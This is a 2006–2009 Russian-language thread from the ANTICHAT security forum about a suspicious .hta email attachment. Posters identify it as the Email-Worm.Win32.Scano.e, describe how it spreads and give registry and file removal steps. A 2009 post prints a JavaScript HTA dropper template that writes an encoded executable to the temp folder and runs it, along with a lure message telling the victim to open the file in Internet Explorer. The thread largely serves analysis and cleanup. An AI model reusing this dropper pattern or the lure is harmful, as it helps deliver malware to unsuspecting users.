HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Странныое сообщение (_________.hta )
  #1  
Старый 11.07.2006, 21:48
TERYS
Участник форума
Регистрация: 11.01.2006
Сообщений: 128
С нами: 10699526

Репутация: 55
По умолчанию Странныое сообщение (_________.hta )

Сегодня на 2 моих ящика пришло 2 примерно одинаковых сообщения, типа привет как дела ... вот заплатка или прога от нового вируса, но факт в том, что эти сообщения пришли с разных ящиков и с одним и тем же файликом

Имя файла: _________.hta
Размер файла: 60КБ

имя файла одинаковвые как на одном так и на другом мыле.
Что это может значить, и не приходило ли вам такое сообщение?

Вот залил эту прогу, толи заплатку сюда: http://slil.ru/22915583

Жду ответов...
 
Ответить с цитированием

  #2  
Старый 11.07.2006, 22:14
r0
Постоянный
Регистрация: 17.07.2005
Сообщений: 475
С нами: 10955906

Репутация: 488
По умолчанию

скачал, открыл - vbs скрипт, и дира " C: " .. ... .. лог. бомба? =)
 
Ответить с цитированием

  #3  
Старый 12.07.2006, 02:41
Eco[L]og
Новичок
Регистрация: 02.07.2006
Сообщений: 24
С нами: 10451885

Репутация: 14
По умолчанию

это Email-Worm.Win32.Scano.e.
Расширение .hta это СИ
 
Ответить с цитированием

  #4  
Старый 12.07.2006, 03:54
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию

...троян это скорее всего.... у меня даже конвектор был exe2hta.....
__________________
 
Ответить с цитированием

  #5  
Старый 12.07.2006, 11:58
Eco[L]og
Новичок
Регистрация: 02.07.2006
Сообщений: 24
С нами: 10451885

Репутация: 14
По умолчанию

нет это не троян. я же написал что это червь....
он сканит машину на адреса почты. Ищит адреса в следующих файлах:
adb asp cfg cgi dbx dhtm dhtml eml htm html jsp mbx mdx mht mmf mra msg nch ods oft php pl sht shtm stm tbb txt uin wab wsh xls xml и рассылает себя по найденым адресам. Причем рассылает себя используя примое подключение к SMTP серваку.
Цитата:
Червь соединяется со следующими удаленными серверами для загрузки других файлов:
http://207.**.250.119
http://84.**.161.192
http://85.249.**.35
Для удаления, если уже подхватили:
Удалить из реестра вот эти записи.
[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe]
"Debugger"="%Windir%\csrss.exe"
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"Application"="%Windir\csrss.exe"

и вот эти файлы
%Windir%\csrss.exe
C:\ntldr.exe

Последний раз редактировалось Eco[L]og; 12.07.2006 в 12:04..
 
Ответить с цитированием

  #6  
Старый 06.02.2009, 18:20
or1
Banned
Регистрация: 07.09.2008
Сообщений: 48
С нами: 9303416

Репутация: -1
По умолчанию

затрояненный HTA-файл может выглядеть примерно так.

<font color="#008000"><HTML>
<HEAD><hta:application />

<SCRIPT language="JavaScript">

code = "MZ%90%00%03%00%00%00%04 ...... "; // Закодированный троян

var fso = new ActiveXObject("Scripting.FileSystemObject");

var tf = fso.GetSpecialFolder(2); // Получим windows\temp
var fn = tf + "\\x.exe"; // Добавим имя файла

var a = fso.CreateTextFile(fn, true); // Запишем в файл тело трояна
a.Write(unescape(code));
a.Close();

var WshShell = new ActiveXObject("WScript.Shell");
WshShell.Exec(fn); // Запустим его

</SCRIPT>
</HEAD>
<BODY>
Привет, чувак!
TheBat не показывает картинки, так что открой этот файл в Ехплорере.
</BODY>
</HTML></font>
---------------------------------------------------------------------------------------------------
вопрос что за этот код и как и с чем его едят

code = "MZ%90%00%03%00%00%00%04 ...... "; // Закодированный троян
 
Ответить с цитированием

  #7  
Старый 06.02.2009, 22:34
lmns
Постоянный
Регистрация: 21.02.2007
Сообщений: 568
С нами: 10114465

Репутация: 303


По умолчанию

or1, нах поднял тему 2-х летней давности?
 
Ответить с цитированием

  #8  
Старый 06.02.2009, 22:35
awdrg
Участник форума
Регистрация: 30.01.2009
Сообщений: 196
С нами: 9094175

Репутация: 66
По умолчанию

некропостер!11один
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Очень красиво опустили СекЛабовцев =) SladerNon Мировые новости. Обсуждения. 28 16.07.2008 06:19
что за сообщение безопастности? donetsk Windows 2 04.05.2006 23:22
Послать сообщение [Artem] Уязвимости 10 02.04.2006 11:37
Вирус в сообщение Icq XgLuiR Skype, IRC, ICQ, Jabber и другие IM 28 12.11.2005 14:58



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.